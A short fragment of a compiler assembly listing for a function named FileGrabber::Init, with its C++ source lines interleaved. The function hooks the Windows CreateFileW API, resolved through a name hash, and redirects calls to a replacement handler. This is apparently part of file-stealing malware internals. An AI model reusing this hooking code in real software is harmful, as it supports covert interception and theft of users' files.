  0004d	83 c4 10	 add	 esp, 16			; 00000010H
  00050	85 c0		 test	 eax, eax
; 390  : 			return false;
  00052	74 cc		 je	 SHORT $LN10@Init
$LN3@Init:
; 391  : 	}
; 392  : 	if( flags & CREATEFILEW )
  00054	f6 44 24 04 02	 test	 BYTE PTR _flags$[esp-4], 2
  00059	74 1d		 je	 SHORT $LN1@Init
; 393  : 	{
; 394  : 		if (!HookApi(DLL_KERNEL32, Hash_CreateFileW, &Hook_CreateFileW, &Real_CreateFileW ) )
  0005b	68 00 00 00 00	 push	 OFFSET ?Real_CreateFileW@FileGrabber@@3P6GPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@ZA ; FileGrabber::Real_CreateFileW
  00060	68 00 00 00 00	 push	 OFFSET ?Hook_CreateFileW@FileGrabber@@YGPAXPB_WKKPAU_SECURITY_ATTRIBUTES@@KKPAX@Z ; FileGrabber::Hook_CreateFileW
  00065	68 02 f1 f8 08	 push	 150532354		; 08f8f102H
  0006a	6a 01		 push	 1
  0006c	e8 00 00 00 00	 call	 ?HookApi@@YAPAXKKPAX0@Z	; HookApi
  00071	83 c4 10	 add	 esp, 16			; 00000010H
  00074	85 c0		 test	 eax, eax
; 395  : 			return false;
  00076	74 a8		 je	 SHORT $LN10@Init
$LN1@Init:
; 396  : 	}
; 397  : 	stateGrabber = 0;
  00078	83 25 00 00 00
	00 00		 and	 DWORD PTR ?stateGrabber@FileGrabber@@3HA, 0 ; FileGrabber::stateGrabber
$LN9@Init:
; 398  : 	return true;
  0007f	b0 01		 mov	 al, 1
; 399  : }
  00081	c3		 ret	 0
?Init@FileGrabber@@YA_NH@Z ENDP				; FileGrabber::Init
_TEXT	ENDS